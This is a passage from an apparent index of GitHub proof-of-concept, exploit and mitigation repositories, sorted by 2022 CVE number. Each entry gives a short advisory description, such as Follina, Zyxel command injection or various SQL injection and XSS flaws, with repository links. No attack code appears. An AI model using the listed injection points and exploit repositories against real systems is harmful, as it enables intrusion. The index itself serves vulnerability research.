[sentinelblue/CVE-2022-30190](https://github.com/sentinelblue/CVE-2022-30190) +- [aymankhder/MSDT_CVE-2022-30190-follina-](https://github.com/aymankhder/MSDT_CVE-2022-30190-follina-) +- [PaddlingCode/cve-2022-30190](https://github.com/PaddlingCode/cve-2022-30190) +- [dwisiswant0/gollina](https://github.com/dwisiswant0/gollina) +- [hscorpion/CVE-2022-30190](https://github.com/hscorpion/CVE-2022-30190) +- [drgreenthumb93/CVE-2022-30190-follina](https://github.com/drgreenthumb93/CVE-2022-30190-follina) +- [mitespsoc/CVE-2022-30190-POC](https://github.com/mitespsoc/CVE-2022-30190-POC) +- [Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc](https://github.com/Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc) +- [rouben/CVE-2022-30190-NSIS](https://github.com/rouben/CVE-2022-30190-NSIS) +- [Cosmo121/Follina-Remediation](https://github.com/Cosmo121/Follina-Remediation) +- [rayorole/CVE-2022-30190](https://github.com/rayorole/CVE-2022-30190) +- [ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190](https://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190) +- [sudoaza/CVE-2022-30190](https://github.com/sudoaza/CVE-2022-30190) +- [gamingwithevets/msdt-disable](https://github.com/gamingwithevets/msdt-disable) +- [ErrorNoInternet/FollinaScanner](https://github.com/ErrorNoInternet/FollinaScanner) +- [ITMarcin2211/CVE-2022-30190](https://github.com/ITMarcin2211/CVE-2022-30190) +- [derco0n/mitigate-folina](https://github.com/derco0n/mitigate-folina) +- [komomon/CVE-2022-30190-follina-Office-MSDT-Fixed](https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed) +- [gyaansastra/CVE-2022-30190](https://github.com/gyaansastra/CVE-2022-30190) +- [swaiist/CVE-2022-30190-Fix](https://github.com/swaiist/CVE-2022-30190-Fix) +- [suenerve/CVE-2022-30190-Follina-Patch](https://github.com/suenerve/CVE-2022-30190-Follina-Patch) +- [castlesmadeofsand/ms-msdt-vulnerability-pdq-package](https://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package) +- [WesyHub/CVE-2022-30190---Follina---Poc-Exploit](https://github.com/WesyHub/CVE-2022-30190---Follina---Poc-Exploit) +- [0xflagplz/MS-MSDT-Office-RCE-Follina](https://github.com/0xflagplz/MS-MSDT-Office-RCE-Follina) +- [arozx/CVE-2022-30190](https://github.com/arozx/CVE-2022-30190) +- [Noxtal/follina](https://github.com/Noxtal/follina) +- [droidrzrlover/CVE-2022-30190](https://github.com/droidrzrlover/CVE-2022-30190) +- [hilt86/cve-2022-30190-mitigate](https://github.com/hilt86/cve-2022-30190-mitigate) +- [SrikeshMaharaj/CVE-2022-30190](https://github.com/SrikeshMaharaj/CVE-2022-30190) +- [AbdulRKB/Follina](https://github.com/AbdulRKB/Follina) +- [DerZiad/CVE-2022-30190](https://github.com/DerZiad/CVE-2022-30190) +- [tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt](https://github.com/tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt) +- [ItsNee/Follina-CVE-2022-30190-POC](https://github.com/ItsNee/Follina-CVE-2022-30190-POC) +- [IamVSM/msdt-follina](https://github.com/IamVSM/msdt-follina) +- [Rojacur/FollinaPatcherCLI](https://github.com/Rojacur/FollinaPatcherCLI) +- [joshuavanderpoll/CVE-2022-30190](https://github.com/joshuavanderpoll/CVE-2022-30190) +- [abhirules27/Follina](https://github.com/abhirules27/Follina) +- [dsibilio/follina-spring](https://github.com/dsibilio/follina-spring) +- [Malwareman007/Deathnote](https://github.com/Malwareman007/Deathnote) +- [sentrium-security/Follina-Workaround-CVE-2022-30190](https://github.com/sentrium-security/Follina-Workaround-CVE-2022-30190) +- [Hrishikesh7665/Follina_Exploiter_CLI](https://github.com/Hrishikesh7665/Follina_Exploiter_CLI) +- [b401/Clickstudio-compromised-certificate](https://github.com/b401/Clickstudio-compromised-certificate) +- [k508/CVE-2022-30190](https://github.com/k508/CVE-2022-30190) +- [amitniz/follina_cve_2022-30190](https://github.com/amitniz/follina_cve_2022-30190) +- [Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab](https://github.com/Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab) +- [SrCroqueta/CVE-2022-30190_Temporary_Fix](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix) +- [SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code) +- [SonicWave21/Follina-CVE-2022-30190-Unofficial-patch](https://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch) +- [nanaao/PicusSecurity4.Week.Repo](https://github.com/nanaao/PicusSecurity4.Week.Repo) +- [XxToxicScriptxX/CVE-2022-30190](https://github.com/XxToxicScriptxX/CVE-2022-30190) +- [ernestak/CVE-2022-30190](https://github.com/ernestak/CVE-2022-30190) +- [ernestak/Sigma-Rule-for-CVE-2022-30190](https://github.com/ernestak/Sigma-Rule-for-CVE-2022-30190) +- [MalwareTech/FollinaExtractor](https://github.com/MalwareTech/FollinaExtractor) +- [notherealhazard/follina-CVE-2022-30190](https://github.com/notherealhazard/follina-CVE-2022-30190) +- [Cerebrovinny/follina-CVE-2022-30190](https://github.com/Cerebrovinny/follina-CVE-2022-30190) +- [Lucaskrell/go_follina](https://github.com/Lucaskrell/go_follina) +- [Gra3s/CVE-2022-30190_EXP_PowerPoint](https://github.com/Gra3s/CVE-2022-30190_EXP_PowerPoint) +- [EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-](https://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-) +- [jeffreybxu/five-nights-at-follina-s](https://github.com/jeffreybxu/five-nights-at-follina-s) +- [Captain404/Follina-CVE-2022-30190-PoC-sample](https://github.com/Captain404/Follina-CVE-2022-30190-PoC-sample) +- [winstxnhdw/CVE-2022-30190](https://github.com/winstxnhdw/CVE-2022-30190) +- [Imeneallouche/Follina-attack-CVE-2022-30190-](https://github.com/Imeneallouche/Follina-attack-CVE-2022-30190-) +- [mattjmillner/CVE-Smackdown](https://github.com/mattjmillner/CVE-Smackdown) +- [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit) +- [michealadams30/Cve-2022-30190](https://github.com/michealadams30/Cve-2022-30190) +- [melting0256/Enterprise-Cybersecurity](https://github.com/melting0256/Enterprise-Cybersecurity) +- [yrkuo/CVE-2022-30190](https://github.com/yrkuo/CVE-2022-30190) +- [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190) +- [hycheng15/CVE-2022-30190](https://github.com/hycheng15/CVE-2022-30190) +- [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190) +- [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190) +- [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord) +- [shri142/ZipScan](https://github.com/shri142/ZipScan) +- [alien-keric/CVE-2022-30190](https://github.com/alien-keric/CVE-2022-30190) +- [ethicalblue/Follina-CVE-2022-30190-Sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-Sample) + +### CVE-2022-30203 (2022-07-12) + +Windows Boot Manager Security Feature Bypass Vulnerability + + +- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk) + +### CVE-2022-30206 (2022-07-12) + +Windows Print Spooler Elevation of Privilege Vulnerability + + +- [MagicPwnrin/CVE-2022-30206](https://github.com/MagicPwnrin/CVE-2022-30206) +- [Malwareman007/CVE-2022-30206](https://github.com/Malwareman007/CVE-2022-30206) + +### CVE-2022-30216 (2022-07-12) + +Windows Server Service Tampering Vulnerability + + +- [corelight/CVE-2022-30216](https://github.com/corelight/CVE-2022-30216) + +### CVE-2022-30292 (2022-05-04) + +Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call. + + +- [sprushed/CVE-2022-30292](https://github.com/sprushed/CVE-2022-30292) + +### CVE-2022-30333 (2022-05-09) + +RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected. + + +- [TheL1ghtVn/CVE-2022-30333-PoC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC) +- [rbowes-r7/unrar-cve-2022-30333-poc](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc) +- [J0hnbX/CVE-2022-30333](https://github.com/J0hnbX/CVE-2022-30333) +- [aslitsecurity/Zimbra-CVE-2022-30333](https://github.com/aslitsecurity/Zimbra-CVE-2022-30333) +- [paradox0909/cve-2022-30333_online_rar_extracor](https://github.com/paradox0909/cve-2022-30333_online_rar_extracor) + +### CVE-2022-30489 (2022-05-13) + +WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + + +- [badboycxcc/XSS-CVE-2022-30489](https://github.com/badboycxcc/XSS-CVE-2022-30489) + +### CVE-2022-30507 +- [yosef0x01/CVE-2022-30507-PoC](https://github.com/yosef0x01/CVE-2022-30507-PoC) + +### CVE-2022-30510 (2022-05-27) + +School Dormitory Management System 1.0 is vulnerable to SQL Injection via reports/daily_collection_report.php:59. + + +- [bigzooooz/CVE-2022-30510](https://github.com/bigzooooz/CVE-2022-30510) + +### CVE-2022-30511 (2022-05-27) + +School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/view_details.php:4. + + +- [bigzooooz/CVE-2022-30511](https://github.com/bigzooooz/CVE-2022-30511) + +### CVE-2022-30512 (2022-05-27) + +School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31. + + +- [bigzooooz/CVE-2022-30512](https://github.com/bigzooooz/CVE-2022-30512) + +### CVE-2022-30513 (2022-05-27) + +School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125 + + +- [bigzooooz/CVE-2022-30513](https://github.com/bigzooooz/CVE-2022-30513) + +### CVE-2022-30514 (2022-05-27) + +School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:126. + + +- [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514) + +### CVE-2022-30524 (2022-05-09) + +There is an invalid memory access in the TextLine class in TextOutputDev.cc in Xpdf 4.0.4 because the text extractor mishandles characters at large y coordinates. It can be triggered by (for example) sending a crafted pdf file to the pdftotext binary, which allows a remote attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. + + +- [rishvic/xpdf-docker](https://github.com/rishvic/xpdf-docker) + +### CVE-2022-30525 (2022-05-12) + +A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + + +- [jbaines-r7/victorian_machinery](https://github.com/jbaines-r7/victorian_machinery) +- [Henry4E36/CVE-2022-30525](https://github.com/Henry4E36/CVE-2022-30525) +- [shuai06/CVE-2022-30525](https://github.com/shuai06/CVE-2022-30525) +- [savior-only/CVE-2022-30525](https://github.com/savior-only/CVE-2022-30525) +- [M4fiaB0y/CVE-2022-30525](https://github.com/M4fiaB0y/CVE-2022-30525) +- [k0sf/CVE-2022-30525](https://github.com/k0sf/CVE-2022-30525) +- [superzerosec/CVE-2022-30525](https://github.com/superzerosec/CVE-2022-30525) +- [Chocapikk/CVE-2022-30525-Reverse-Shell](https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell) +- [160Team/CVE-2022-30525](https://github.com/160Team/CVE-2022-30525) +- [iveresk/cve-2022-30525](https://github.com/iveresk/cve-2022-30525) +- [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525) +- [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525) +- [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525) +- [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check) +- [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit) + +### CVE-2022-30526 (2022-07-19) + +A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device. + + +- [greek0x0/CVE-2022-30526](https://github.com/greek0x0/CVE-2022-30526) + +### CVE-2022-30591 (2022-07-06) + +quic-go through 0.27.0 allows remote attackers to cause a denial of service (CPU consumption) via a Slowloris variant in which incomplete QUIC or HTTP/3 requests are sent. This occurs because mtu_discoverer.go misparses the MTU Discovery service and consequently overflows the probe timer. NOTE: the vendor's position is that this behavior should not be listed as a vulnerability on the CVE List + + +- [efchatz/QUIC-attacks](https://github.com/efchatz/QUIC-attacks) + +### CVE-2022-30592 (2022-05-11) + +liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY. + + +- [efchatz/HTTP3-attacks](https://github.com/efchatz/HTTP3-attacks) + +### CVE-2022-30594 (2022-05-12) + +The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag. + + +- [Lay0us/linux-4.19.72_CVE-2022-30594](https://github.com/Lay0us/linux-4.19.72_CVE-2022-30594) + +### CVE-2022-30600 (2022-05-18) + +A flaw was found in moodle where logic used to count failed login attempts could result in the account lockout threshold being bypassed. + + +- [Boonjune/POC-CVE-2022-30600](https://github.com/Boonjune/POC-CVE-2022-30600) + +### CVE-2022-30778 +- [kang8/CVE-2022-30778](https://github.com/kang8/CVE-2022-30778) + +### CVE-2022-30780 (2022-06-11) + +Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers. + + +- [p0dalirius/CVE-2022-30780-lighttpd-denial-of-service](https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service) +- [xiw1ll/CVE-2022-30780_Checker](https://github.com/xiw1ll/CVE-2022-30780_Checker) + +### CVE-2022-30781 (2022-05-16) + +Gitea before 1.16.7 does not escape git fetch remote. + + +- [wuhan005/CVE-2022-30781](https://github.com/wuhan005/CVE-2022-30781) + +### CVE-2022-30887 (2022-05-20) + +Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file. + + +- [MuallimNaci/CVE-2022-30887](https://github.com/MuallimNaci/CVE-2022-30887) + +### CVE-2022-30929 (2022-07-06) + +Mini-Tmall v1.0 is vulnerable to Insecure Permissions via tomcat-embed-jasper. + + +- [nanaao/CVE-2022-30929](https://github.com/nanaao/CVE-2022-30929) + +### CVE-2022-31007 (2022-05-31) + +eLabFTW is an electronic lab notebook manager for research teams. Prior to version 4.3.0, a vulnerability allows an authenticated user with an administrator role in a team to assign itself system administrator privileges within the application, or create a new system administrator account. The issue has been corrected in eLabFTW version 4.3.0. In the context of eLabFTW, an administrator is a user account with certain privileges to manage users and content in their assigned team/teams. A system administrator account can manage all accounts, teams and edit system-wide settings within the application. The impact is not deemed as high, as it requires the attacker to have access to an administrator account. Regular user accounts cannot exploit this to gain admin rights. A workaround for one if the issues is removing the ability of administrators to create accounts. + + +- [gregscharf/CVE-2022-31007-Python-POC](https://github.com/gregscharf/CVE-2022-31007-Python-POC) + +### CVE-2022-31061 (2022-06-28) + +GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. + + +- [Wangyanan131/CVE-2022-31061](https://github.com/Wangyanan131/CVE-2022-31061) + +### CVE-2022-31101 (2022-06-27) + +prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue. + + +- [MathiasReker/blmvuln](https://github.com/MathiasReker/blmvuln) +- [karthikuj/CVE-2022-31101](https://github.com/karthikuj/CVE-2022-31101) + +### CVE-2022-31138 (2022-07-11) + +mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings. + + +- [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138) + +### CVE-2022-31144 (2022-07-19) + +Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result with heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4. + + +- [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144) + +### CVE-2022-31181 (2022-08-01) + +PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature. + + +- [drkbcn/lblfixer_cve_2022_31181](https://github.com/drkbcn/lblfixer_cve_2022_31181) + +### CVE-2022-31188 (2022-08-01) + +CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue. + + +- [emirpolatt/CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188) + +### CVE-2022-31245 (2022-05-20) + +mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs. + + +- [ly1g3/Mailcow-CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245) + +### CVE-2022-31262 (2022-08-17) + +An exploitable local privilege escalation vulnerability exists in GOG Galaxy 2.0.46. Due to insufficient folder permissions, an attacker can hijack the %ProgramData%\GOG.com folder structure and change the GalaxyCommunication service executable to a malicious file, resulting in code execution as SYSTEM. + + +- [secure-77/CVE-2022-31262](https://github.com/secure-77/CVE-2022-31262) + +### CVE-2022-31269 (2022-08-25) + +Nortek Linear eMerge E3-Series devices through 0.32-09c place admin credentials in /test.txt that allow an attacker to open a building's doors. (This occurs in situations where the CVE-2019-7271 default credentials have been changed.) + + +- [Henry4E36/CVE-2022-31269](https://github.com/Henry4E36/CVE-2022-31269) +- [omarhashem123/CVE-2022-31269](https://github.com/omarhashem123/CVE-2022-31269) + +### CVE-2022-31294 (2022-06-16) + +An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts. + + +- [bigzooooz/CVE-2022-31294](https://github.com/bigzooooz/CVE-2022-31294) + +### CVE-2022-31295 (2022-06-16) + +An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts. + + +- [bigzooooz/CVE-2022-31295](https://github.com/bigzooooz/CVE-2022-31295) + +### CVE-2022-31296 (2022-06-17) + +Online Discussion Forum Site 1 was discovered to contain a blind SQL injection vulnerability via the component /odfs/posts/view_post.php. + + +- [bigzooooz/CVE-2022-31296](https://github.com/bigzooooz/CVE-2022-31296) + +### CVE-2022-31297 +- [bigzooooz/CVE-2022-31297](https://github.com/bigzooooz/CVE-2022-31297) + +### CVE-2022-31298 (2022-06-16) + +A cross-site scripting vulnerability in the ads comment section of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request. + + +- [bigzooooz/CVE-2022-31298](https://github.com/bigzooooz/CVE-2022-31298) + +### CVE-2022-31299 (2022-06-16) + +Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form. + + +- [bigzooooz/CVE-2022-31299](https://github.com/bigzooooz/CVE-2022-31299) + +### CVE-2022-31300 (2022-06-16) + +A cross-site scripting vulnerability in the DM Section component of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request. + + +- [bigzooooz/CVE-2022-31300](https://github.com/bigzooooz/CVE-2022-31300) + +### CVE-2022-31301 (2022-06-16) + +Haraj v3.7 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Post Ads component. + + +- [bigzooooz/CVE-2022-31301](https://github.com/bigzooooz/CVE-2022-31301) + +### CVE-2022-31402 (2022-06-10) + +ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/webservices/export-v2.php. + + +- [YavuzSahbaz/CVE-2022-31402](https://github.com/YavuzSahbaz/CVE-2022-31402) + +### CVE-2022-31403 (2022-06-14) + +ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/pages/ajax.render.php. + + +- [IbrahimEkimIsik/CVE-2022-31403](https://github.com/IbrahimEkimIsik/CVE-2022-31403) + +### CVE-2022-31479 (2022-06-06) + +An unauthenticated attacker can update the hostname with a specially crafted name that will allow for shell commands to be executed during the core collection process. This vulnerability impacts products based on HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, and EP4502 which contain firmware versions prior to 1.302 for the LP series and 1.296 for the EP series. An attacker with this level of access on the device can monitor all communications sent to and from this device, modify onboard relays, change configuration files, or cause the device to become unstable. The injected commands only get executed during start up or when unsafe calls regarding the hostname are used. This allows the attacker to gain remote access to the device and can make their persistence permanent by modifying the filesystem. + + +- [realyme/CVE-2022-31479-test](https://github.com/realyme/CVE-2022-31479-test) + +### CVE-2022-31499 (2022-08-25) + +Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256. + + +- [omarhashem123/CVE-2022-31499](https://github.com/omarhashem123/CVE-2022-31499) + +### CVE-2022-31626 (2022-06-16) + +In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability. + + +- [amitlttwo/CVE-2022-31626](https://github.com/amitlttwo/CVE-2022-31626) + +### CVE-2022-31629 (2022-09-28) + +In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications. + + +- [silnex/CVE-2022-31629-poc](https://github.com/silnex/CVE-2022-31629-poc) + +### CVE-2022-31691 (2022-11-04) + +Spring Tools 4 for Eclipse version 4.16.0 and below as well as VSCode extensions such as Spring Boot Tools, Concourse CI Pipeline Editor, Bosh Editor and Cloudfoundry Manifest YML Support version 1.39.0 and below all use Snakeyaml library for YAML editing support. This library allows for some special syntax in the YAML that under certain circumstances allows for potentially harmful remote code execution by the attacker. + + +- [SpindleSec/CVE-2022-31691](https://github.com/SpindleSec/CVE-2022-31691) + +### CVE-2022-31692 (2022-10-31) + +Spring Security, versions 5.7 prior to 5.7.5 and 5.6 prior to 5.6.9 could be susceptible to authorization rules bypass via forward or include dispatcher types. Specifically, an application is vulnerable when all of the following are true: The application expects that Spring Security applies security to forward and include dispatcher types. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include). The application may forward or include the request to a higher privilege-secured endpoint.The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true) + + +- [SpindleSec/cve-2022-31692](https://github.com/SpindleSec/cve-2022-31692) +- [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692) + +### CVE-2022-31705 (2022-12-14) + +VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed. + + +- [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705) + +### CVE-2022-31749 +- [jbaines-r7/hook](https://github.com/jbaines-r7/hook) +- [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749) + +### CVE-2022-31793 (2022-08-04) + +do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected. + + +- [xpgdgit/CVE-2022-31793](https://github.com/xpgdgit/CVE-2022-31793) + +### CVE-2022-31798 (2022-08-25) + +Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account. + + +- [omarhashem123/CVE-2022-31798](https://github.com/omarhashem123/CVE-2022-31798) + +### CVE-2022-31814 (2022-09-05) + +pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + + +- [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence) +- [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814) +- [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814) +- [drcayber/RCE](https://github.com/drcayber/RCE) +- [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814) +- [dkstar11q/CVE-2022-31814](https://github.com/dkstar11q/CVE-2022-31814) +- [Laburity/CVE-2022-31814](https://github.com/Laburity/CVE-2022-31814) +- [ArunHAtter/CVE-2022-31814](https://github.com/ArunHAtter/CVE-2022-31814) + +### CVE-2022-31854 (2022-07-07) + +Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel. + + +- [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854) + +### CVE-2022-31889 (2023-04-05) + +Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae. + + +- [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889) + +### CVE-2022-31890 (2023-04-05) + +SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function. + + +- [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890) + +### CVE-2022-31897 (2022-06-29) + +SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=. + + +- [angelopioamirante/CVE-2022-31897](https://github.com/angelopioamirante/CVE-2022-31897) + +### CVE-2022-31898 (2022-10-27) + +gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters. + + +- [gigaryte/cve-2022-31898](https://github.com/gigaryte/cve-2022-31898) + +### CVE-2022-31901 (2023-01-19) + +Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files. + + +- [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901) + +### CVE-2022-31902 (2023-02-01) + +Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add(). + + +- [CDACesec/CVE-2022-31902](https://github.com/CDACesec/CVE-2022-31902) + +### CVE-2022-31983 (2022-06-01) + +Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + + +- [mel1huc4r/CVE-2022-31983](https://github.com/mel1huc4r/CVE-2022-31983) + +### CVE-2022-32013 (2022-06-02) + +Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=. + + +- 